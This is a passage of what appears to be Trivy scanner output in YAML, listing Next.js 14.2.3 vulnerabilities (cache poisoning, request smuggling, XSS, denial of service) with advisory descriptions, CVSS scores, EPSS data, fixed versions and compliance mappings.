epss_multiplier: 1.00108
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 04e5c6fdba912e88
ruleId: CVE-2026-27980
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage'
title: CVE-2026-27980
description: 'Next.js is a React framework for building full-stack web applications.
Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image
optimization disk cache (`/_next/image`) did not have a configurable upper bound,
allowing unbounded cache growth. An attacker could generate many unique image-optimization
variants and exhaust disk space, causing denial of service. This is fixed in version
16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`,
including eviction of least-recently-used entries when the limit is exceeded.
Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not immediately
possible, periodically clean `.next/cache/images` and/or reduce variant cardinality
(e.g., tighten values for `images.localPatterns`, `images.remotePatterns`, and
`images.qualities`).'
remediation: https://avd.aquasec.com/nvd/cve-2026-27980
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id035
- CWE-400
raw:
VulnerabilityID: CVE-2026-27980
VendorIDs:
- GHSA-3x4c-7xq6-9pq8
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 16.1.7, 15.5.14
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-27980
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:5dec13177768ddafe594e0b28117c9687a4df1799c6cf21c3db279c85cdce71f
Title: 'next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage'
Description: 'Next.js is a React framework for building full-stack web applications.
Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js
image optimization disk cache (`/_next/image`) did not have a configurable upper
bound, allowing unbounded cache growth. An attacker could generate many unique
image-optimization variants and exhaust disk space, causing denial of service.
This is fixed in version 16.1.7 by adding an LRU-backed disk cache with `images.maximumDiskCacheSize`,
including eviction of least-recently-used entries when the limit is exceeded.
Setting `maximumDiskCacheSize: 0` disables disk caching. If upgrading is not
immediately possible, periodically clean `.next/cache/images` and/or reduce
variant cardinality (e.g., tighten values for `images.localPatterns`, `images.remotePatterns`,
and `images.qualities`).'
Severity: MEDIUM
CweIDs: *id035
VendorSeverity:
ghsa: 2
nvd: 3
redhat: 2
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
V40Score: 6.9
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
V3Score: 5.3
References:
- https://access.redhat.com/security/cve/CVE-2026-27980
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/39eb8e0ac498b48855a0430fbf4c22276a73b4bd
- https://github.com/vercel/next.js/releases/tag/v16.1.7
- https://github.com/vercel/next.js/security/advisories/GHSA-3x4c-7xq6-9pq8
- https://nvd.nist.gov/vuln/detail/CVE-2026-27980
- https://www.cve.org/CVERecord?id=CVE-2026-27980
PublishedDate: '2026-03-18T01:16:04.957Z'
LastModifiedDate: '2026-03-18T19:52:54.307Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.345066666666668
epss: 0.00022
epss_percentile: 0.06354
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00088
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 868dbd425c7fc3b4
ruleId: CVE-2026-29057
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'next.js: Next.js: HTTP request smuggling in rewrites'
title: CVE-2026-29057
description: "Next.js is a React framework for building full-stack web applications.\
\ Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js\
\ rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS`\
\ request using `Transfer-Encoding: chunked` could trigger request boundary disagreement\
\ between the proxy and backend. This could allow request smuggling through rewritten\
\ routes. An attacker could smuggle a second request to unintended backend routes\
\ (for example, internal/admin endpoints), bypassing assumptions that only the\
\ configured rewrite destination/path is reachable. This does not impact applications\
\ hosted on providers that handle rewrites at the CDN level, such as Vercel. \
\ The vulnerability originated in an upstream library vendored by Next.js. It\
\ is fixed in Next.js 15.5.13 and 16.1.7 by updating that dependency\u2019s behavior\
\ so `content-length: 0` is added only when both `content-length` and `transfer-encoding`\
\ are absent, and `transfer-encoding` is no longer removed in that code path.\
\ If upgrading is not immediately possible, block chunked `DELETE`/`OPTIONS` requests\
\ on rewritten routes at the edge/proxy, and/or enforce authentication/authorization\
\ on backend routes."
remediation: https://avd.aquasec.com/nvd/cve-2026-29057
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id036
- CWE-444
raw:
VulnerabilityID: CVE-2026-29057
VendorIDs:
- GHSA-ggv3-7p47-pfv8
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 16.1.7, 15.5.13
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-29057
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:4074e32bdcb36d75198ac9560fe4244edba80bb6731805115c47dcfbb97b302f
Title: 'next.js: Next.js: HTTP request smuggling in rewrites'
Description: "Next.js is a React framework for building full-stack web applications.\
\ Starting in version 9.5.0 and prior to versions 15.5.13 and 16.1.7, when Next.js\
\ rewrites proxy traffic to an external backend, a crafted `DELETE`/`OPTIONS`\
\ request using `Transfer-Encoding: chunked` could trigger request boundary\
\ disagreement between the proxy and backend. This could allow request smuggling\
\ through rewritten routes. An attacker could smuggle a second request to unintended\
\ backend routes (for example, internal/admin endpoints), bypassing assumptions\
\ that only the configured rewrite destination/path is reachable. This does\
\ not impact applications hosted on providers that handle rewrites at the CDN\
\ level, such as Vercel. The vulnerability originated in an upstream library\
\ vendored by Next.js. It is fixed in Next.js 15.5.13 and 16.1.7 by updating\
\ that dependency\u2019s behavior so `content-length: 0` is added only when\
\ both `content-length` and `transfer-encoding` are absent, and `transfer-encoding`\
\ is no longer removed in that code path. If upgrading is not immediately possible,\
\ block chunked `DELETE`/`OPTIONS` requests on rewritten routes at the edge/proxy,\
\ and/or enforce authentication/authorization on backend routes."
Severity: MEDIUM
CweIDs: *id036
VendorSeverity:
ghsa: 2
nvd: 2
redhat: 2
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
V40Score: 6.3
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
V3Score: 6.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
V3Score: 6.5
References:
- https://access.redhat.com/security/cve/CVE-2026-29057
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/commit/dc98c04f376c6a1df76ec3e0a2d07edf4abdabd6
- https://github.com/vercel/next.js/releases/tag/v15.5.13
- https://github.com/vercel/next.js/releases/tag/v16.1.7
- https://github.com/vercel/next.js/security/advisories/GHSA-ggv3-7p47-pfv8
- https://nvd.nist.gov/vuln/detail/CVE-2026-29057
- https://www.cve.org/CVERecord?id=CVE-2026-29057
PublishedDate: '2026-03-18T01:16:05.443Z'
LastModifiedDate: '2026-03-18T19:49:19.633Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.349866666666665
epss: 0.00031
epss_percentile: 0.0913
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00124
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e4364d984e862d8f
ruleId: CVE-2026-44576
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js vulnerable to cache poisoning in React Server Component responses
title: CVE-2026-44576
description: Next.js is a React framework for building full-stack web applications.
From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components
can be vulnerable to cache poisoning when shared caches do not correctly partition
response variants. Under affected conditions, an attacker can cause an RSC response
to be served from the original URL and poison shared cache entries so later visitors
receive component payloads instead of the expected HTML. This vulnerability is
fixed in 15.5.16 and 16.2.5.
remediation: https://avd.aquasec.com/nvd/cve-2026-44576
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id037
- CWE-436
raw:
VulnerabilityID: CVE-2026-44576
VendorIDs:
- GHSA-wfc6-r584-vfw7
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44576
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:3c9e2e46b20aad817d3abe8e7abd455ede89a3c4d8a51dc478704b39dba080bb
Title: Next.js vulnerable to cache poisoning in React Server Component responses
Description: Next.js is a React framework for building full-stack web applications.
From 14.2.0 to before 15.5.16 and 16.2.5, applications using React Server Components
can be vulnerable to cache poisoning when shared caches do not correctly partition
response variants. Under affected conditions, an attacker can cause an RSC response
to be served from the original URL and poison shared cache entries so later
visitors receive component payloads instead of the expected HTML. This vulnerability
is fixed in 15.5.16 and 16.2.5.
Severity: MEDIUM
CweIDs: *id037
VendorSeverity:
ghsa: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L
V3Score: 5.4
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v15.5.16
- https://github.com/vercel/next.js/releases/tag/v16.2.5
- https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7
- https://nvd.nist.gov/vuln/detail/CVE-2026-44576
PublishedDate: '2026-05-13T17:16:23.04Z'
LastModifiedDate: '2026-05-14T13:44:18.27Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.341866666666666
epss: 0.00016
epss_percentile: 0.03853
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00064
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4721ee25bf757892
ruleId: CVE-2026-44577
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js has a Denial of Service in the Image Optimization API
title: CVE-2026-44577
description: Next.js is a React framework for building full-stack web applications.
From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default
image loader, the Image Optimization API fetches local images entirely into memory
without enforcing a maximum size limit. An attacker could cause out-of-memory
conditions by requesting large local assets from the /_next/image endpoint that
match the images.localPatterns configuration (by default, all patterns are allowed).
This vulnerability is fixed in 15.5.16 and 16.2.5.
remediation: https://avd.aquasec.com/nvd/cve-2026-44577
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id038
- CWE-770
raw:
VulnerabilityID: CVE-2026-44577
VendorIDs:
- GHSA-h64f-5h5j-jqjh
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44577
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:9f08da120547fe06a6ff340ef05ca8e057af610a1e77041d7d119d2cea50fca0
Title: Next.js has a Denial of Service in the Image Optimization API
Description: Next.js is a React framework for building full-stack web applications.
From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the
default image loader, the Image Optimization API fetches local images entirely
into memory without enforcing a maximum size limit. An attacker could cause
out-of-memory conditions by requesting large local assets from the /_next/image
endpoint that match the images.localPatterns configuration (by default, all
patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.
Severity: MEDIUM
CweIDs: *id038
VendorSeverity:
ghsa: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 5.9
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v15.5.16
- https://github.com/vercel/next.js/releases/tag/v16.2.5
- https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh
- https://nvd.nist.gov/vuln/detail/CVE-2026-44577
PublishedDate: '2026-05-13T17:16:23.173Z'
LastModifiedDate: '2026-05-13T20:00:59.993Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.342933333333333
epss: 0.00018
epss_percentile: 0.0459
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00072
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 550fe8bea52b0c14
ruleId: CVE-2026-44580
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js has cross-site scripting in beforeInteractive scripts with untrusted
input
title: CVE-2026-44580
description: Next.js is a React framework for building full-stack web applications.
From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive
scripts together with untrusted content can be vulnerable to cross-site scripting.
In affected versions, serialized script content was not escaped safely before
being embedded into the document, which could allow attacker-controlled input
to break out of the intended script context and execute arbitrary JavaScript in
a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.
remediation: https://avd.aquasec.com/nvd/cve-2026-44580
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id039
- CWE-79
raw:
VulnerabilityID: CVE-2026-44580
VendorIDs:
- GHSA-gx5p-jg67-6x7h
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44580
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:271ac03a6853a4a85c0ed6629628a269cc75c889ec605033b36b7d5a63fe43fb
Title: Next.js has cross-site scripting in beforeInteractive scripts with untrusted
input
Description: Next.js is a React framework for building full-stack web applications.
From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive
scripts together with untrusted content can be vulnerable to cross-site scripting.
In affected versions, serialized script content was not escaped safely before
being embedded into the document, which could allow attacker-controlled input
to break out of the intended script context and execute arbitrary JavaScript
in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.
Severity: MEDIUM
CweIDs: *id039
VendorSeverity:
ghsa: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
V3Score: 6.1
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v15.5.16
- https://github.com/vercel/next.js/releases/tag/v16.2.5
- https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h
- https://nvd.nist.gov/vuln/detail/CVE-2026-44580
PublishedDate: '2026-05-13T18:16:18.26Z'
LastModifiedDate: '2026-05-14T18:33:34.17Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A03:2021
cweTop25_2024:
- id: CWE-79
rank: 1
category: Injection
cisControlsV8_1: *id010
nistCsf2_0:
- &id041
function: DETECT
category: DE.CM
subcategory: DE.CM-8
description: Vulnerability scans are performed
- *id011
- *id012
pciDss4_0:
- &id042
requirement: 6.2.4
description: Prevent XSS attacks in bespoke software
priority: CRITICAL
- *id013
- *id014
mitreAttack:
- &id043
tactic: Initial Access
technique: T1190
techniqueName: Exploit Public-Facing Application
subtechnique: ''
subtechniqueName: ''
- *id015
priority:
priority: 13.339733333333335
epss: 0.00012
epss_percentile: 0.01845
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00048
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ffcab1bb08bb5e14
ruleId: CVE-2026-44581
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js vulnerable to cross-site scripting in App Router applications using
CSP nonces
title: CVE-2026-44581
description: Next.js is a React framework for building full-stack web applications.
From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on
CSP nonces can be vulnerable to stored cross-site scripting when deployed behind
shared caches. In affected versions, malformed nonce values derived from request
headers could be reflected into rendered HTML in an unsafe way, allowing an attacker
to poison cached responses and cause script execution for later visitors. This
vulnerability is fixed in 15.5.16 and 16.2.5.
remediation: https://avd.aquasec.com/nvd/cve-2026-44581
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id040
- CWE-79
raw:
VulnerabilityID: CVE-2026-44581
VendorIDs:
- GHSA-ffhc-5mcf-pf4q
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44581
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:6f2ba23fa5d8ac9fe972f5c6d8249e305d739b420e200ac40e762626f914dc86
Title: Next.js vulnerable to cross-site scripting in App Router applications using
CSP nonces
Description: Next.js is a React framework for building full-stack web applications.
From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely
on CSP nonces can be vulnerable to stored cross-site scripting when deployed
behind shared caches. In affected versions, malformed nonce values derived from
request headers could be reflected into rendered HTML in an unsafe way, allowing
an attacker to poison cached responses and cause script execution for later
visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.
Severity: MEDIUM
CweIDs: *id040
VendorSeverity:
ghsa: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
V3Score: 4.7
References:
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/releases/tag/v15.5.16
- https://github.com/vercel/next.js/releases/tag/v16.2.5
- https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q
- https://nvd.nist.gov/vuln/detail/CVE-2026-44581
PublishedDate: '2026-05-13T18:16:18.4Z'
LastModifiedDate: '2026-05-14T18:30:24.34Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
owaspTop10_2021:
- A03:2021
cweTop25_2024:
- id: CWE-79
rank: 1
category: Injection
cisControlsV8_1: *id010
nistCsf2_0:
- *id041
- *id011
- *id012
pciDss4_0:
- *id042
- *id013
- *id014
mitreAttack:
- *id043
- *id015
priority:
priority: 13.352000000000002
epss: 0.00035
epss_percentile: 0.10495
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0014
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f36c532127e73145
ruleId: CVE-2025-32421
severity: LOW
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'next.js: Next.js Race Condition to Cache Poisoning'
title: CVE-2025-32421
description: 'Next.js is a React framework for building full-stack web applications.
Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This
issue only affects the Pages Router under certain misconfigurations, causing normal
endpoints to serve `pageProps` data instead of standard HTML. This issue was patched
in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from
incoming requests. Applications hosted on Vercel''s platform are not affected
by this issue, as the platform does not cache responses based solely on `200 OK`
status without explicit `cache-control` headers. Those who self-host Next.js deployments
and are unable to upgrade immediately can mitigate this vulnerability by stripping
the `x-now-route-matches` header from all incoming requests at the content development
network and setting `cache-control: no-store` for all responses under risk. The
maintainers of Next.js strongly recommend only caching responses with explicit
cache-control headers.'
remediation: https://avd.aquasec.com/nvd/cve-2025-32421
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id044
- CWE-362
raw:
VulnerabilityID: CVE-2025-32421
VendorIDs:
- GHSA-qpjv-v59x-3qc4
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 14.2.24, 15.1.6
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-32421
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:64a9f428dd88df3e06576561410dff61f0fec0914799e7cfd4827204eba10d1b
Title: 'next.js: Next.js Race Condition to Cache Poisoning'
Description: 'Next.js is a React framework for building full-stack web applications.
Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This
issue only affects the Pages Router under certain misconfigurations, causing
normal endpoints to serve `pageProps` data instead of standard HTML. This issue
was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches`
header from incoming requests. Applications hosted on Vercel''s platform are
not affected by this issue, as the platform does not cache responses based solely
on `200 OK` status without explicit `cache-control` headers. Those who self-host
Next.js deployments and are unable to upgrade immediately can mitigate this
vulnerability by stripping the `x-now-route-matches` header from all incoming
requests at the content development network and setting `cache-control: no-store`
for all responses under risk. The maintainers of Next.js strongly recommend
only caching responses with explicit cache-control headers.'
Severity: LOW
CweIDs: *id044
VendorSeverity:
ghsa: 1
redhat: 1
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
V3Score: 3.7
redhat:
V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
V3Score: 3.7
References:
- https://access.redhat.com/security/cve/CVE-2025-32421
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4
- https://nvd.nist.gov/vuln/detail/CVE-2025-32421
- https://vercel.com/changelog/cve-2025-32421
- https://www.cve.org/CVERecord?id=CVE-2025-32421
PublishedDate: '2025-05-14T23:15:47.87Z'
LastModifiedDate: '2025-09-10T15:16:10.053Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cweTop25_2024:
- id: CWE-362
rank: 21
category: Race Condition
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 6.867200000000001
epss: 0.00752
epss_percentile: 0.73386
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.03008
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1ce95f8bcd69d427
ruleId: CVE-2025-48068
severity: LOW
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'next.js: Information exposure in Next.js dev server due to lack of origin
verification'
title: CVE-2025-48068
description: Next.js is a React framework for building full-stack web applications.
In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2,
Next.js may have allowed limited source code exposure when the dev server was
running with the App Router enabled. The vulnerability only affects local development
environments and requires the user to visit a malicious webpage while npm run
dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.
remediation: https://avd.aquasec.com/nvd/cve-2025-48068
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id045
- CWE-1385
raw:
VulnerabilityID: CVE-2025-48068
VendorIDs:
- GHSA-3h52-269p-cp9r
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.2.2, 14.2.30
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-48068
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:69e57f7a20f65a73ee7bd893aee36db195599076d8c92184edf8fe2c2707d9a6
Title: 'next.js: Information exposure in Next.js dev server due to lack of origin
verification'
Description: Next.js is a React framework for building full-stack web applications.
In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2,
Next.js may have allowed limited source code exposure when the dev server was
running with the App Router enabled. The vulnerability only affects local development
environments and requires the user to visit a malicious webpage while npm run
dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.
Severity: LOW
CweIDs: *id045
VendorSeverity:
ghsa: 1
nvd: 2
redhat: 2
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N
V40Score: 2.3
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
V3Score: 4.3
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
V3Score: 4.3
References:
- https://access.redhat.com/security/cve/CVE-2025-48068
- https://github.com/vercel/next.js
- https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r
- https://nvd.nist.gov/vuln/detail/CVE-2025-48068
- https://vercel.com/changelog/cve-2025-48068
- https://www.cve.org/CVERecord?id=CVE-2025-48068
PublishedDate: '2025-05-30T04:15:48.51Z'
LastModifiedDate: '2025-09-10T15:17:38.677Z'
context:
sbom:
name: next
version: 14.2.3
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 6.693600000000001
epss: 0.00101
epss_percentile: 0.2732
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.00404
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e32b41f01db1c199
ruleId: CVE-2026-44572
severity: LOW
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Next.js's Middleware / Proxy redirects can be cache-poisoned
title: CVE-2026-44572
description: Next.js is a React framework for building full-stack web applications.
From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data
header on a normal request to a path handled by middleware that returns a redirect.
When that happened, the middleware/proxy could treat the request as a data request
and replace the standard Location redirect header with the internal x-nextjs-redirect
header. Browsers do not follow x-nextjs-redirect, so the response became an unusable
redirect for normal clients. If the application was deployed behind a CDN or reverse
proxy that caches 3xx responses without varying on this header, a single attacker
request could poison the cached redirect response for the affected path. Subsequent
visitors could then receive a cached redirect response without a Location header,
causing a denial of service for that redirect path until the cache entry expired
or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.
remediation: https://avd.aquasec.com/nvd/cve-2026-44572
references: []
tags:
- vulnerability
- pkg:next@14.2.3
risk:
cwe: &id046
- CWE-349
raw:
VulnerabilityID: CVE-2026-44572
VendorIDs:
- GHSA-3g8h-86w9-wvmq
PkgID: next@14.2.3
PkgName: next
PkgIdentifier:
PURL: pkg:npm/next@14.2.3
UID: 494c23d2c970c8b
InstalledVersion: 14.2.3
FixedVersion: 15.5.16, 16.2.5
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44572
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:7a874ea313c88fdfc018ce40fae507cbe374abff06d472b78d118b05b82c32ac
Title: Next.js's Middleware / Proxy redirects can be cache-poisoned
Description: Next.js is a React framework for building full-stack web applications.
From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data
header on a normal request to a path handled by middleware that returns a redirect.
When that happened, the middleware/proxy could treat the request as a data request
and replace the standard Location redirect header with the internal x-nextjs-redirect
header. Browsers do not follow x-nextjs-redirect, so the response became an
unusable redirect for normal clients. If the application was deployed behind
a CDN or reverse proxy that caches 3xx responses without varying on this header,
a single attacker request could poison the cached redirect response for the
affected path. Subsequent visitors could then receive a cached redirect response
without a Location header, causing a denial of service for that redirect path
until the cache entry expired or was purged. This vulnerability is fixed in
